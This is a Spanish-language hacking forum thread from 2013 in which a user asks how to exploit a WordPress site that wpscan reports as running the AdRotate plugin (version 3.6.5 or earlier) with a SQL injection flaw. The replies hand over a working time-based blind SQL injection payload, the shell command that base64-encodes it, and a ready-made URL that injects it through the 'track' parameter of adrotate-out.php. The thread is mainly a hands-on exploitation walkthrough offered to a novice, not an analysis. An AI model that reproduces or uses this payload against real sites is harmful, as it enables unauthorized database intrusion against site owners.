[Duda] Wordpress vulnerable sql

Iniciado por TheBlack, Agosto 20, 2013, 01:26:09 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 20, 2013, 01:26:09 PM Ultima modificación: Agosto 27, 2014, 08:59:42 PM por Expermicid
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buenas , hola a todos ! (Perdona si el post no va en el sitio adecuado )

Pues tenia una duda con una inyección sql en wordpress. Analizando con wpscan veo que hay un plugin vulnerable . En el wpscan me sale esto :

*Title:Adrotate plugin <= 3.6.5 SQL Injection Vulnerability
*Reference: http:www.exploit-db.com/exploits/18114/

En la pagina de exploit-db me sale el codigo vulnerable pero realmente no se que hacer con eso , si alguien me puede echar una mano o pasarme algun tutorial para leer e informarme se lo agradeceria


payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

es facil la vulnerabilidad esta en la variable track. ahi inyecta el payload encodeado en base64


Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)
Pentest - Hacking & Security Services

Contact me: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Me puedes hacer un pequeño tutorial si no es mucha molestia , es que ahora no entiendo nada
O tambien podrias ponerte a estudiar sqli para que entiendas ese payload ;)

jajaja tenia planeado decir lo mismo pero no quería ser duro xD

Perdon no se me ha ententido muy bien , eh parecido un poco lammer xD, decia algun tutorial o por donde comenzar para aprender .

Agosto 27, 2013, 03:18:23 AM #6 Ultima modificación: Agosto 27, 2013, 03:21:00 AM por TUNOVATO
saludos compa;

haz lo siguiente:

Código: php
http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj



http://www.AQUITUWEB.com/wp-content/plugins/adrotate/adrotate-out.php?track= <-- AQUI ESTO:
Código: php
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj


ESTO:
Código: php
MScgQU5EIDE9SUYoMj4xLEJFTkNITUFSSyg1MDAwMDAwLE1ENShDSEFSKDExNSwxMTMsMTA4LDEwOSw5NywxMTIpKSksMCkj


ES ESTO:
Código: php
1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#


lo cual esta encodeado en based64


si no entendistes como funciona.....  vas a tener que leeerrr y mucho..... o mejor te dedicas a otras cosas...  :o


saludos;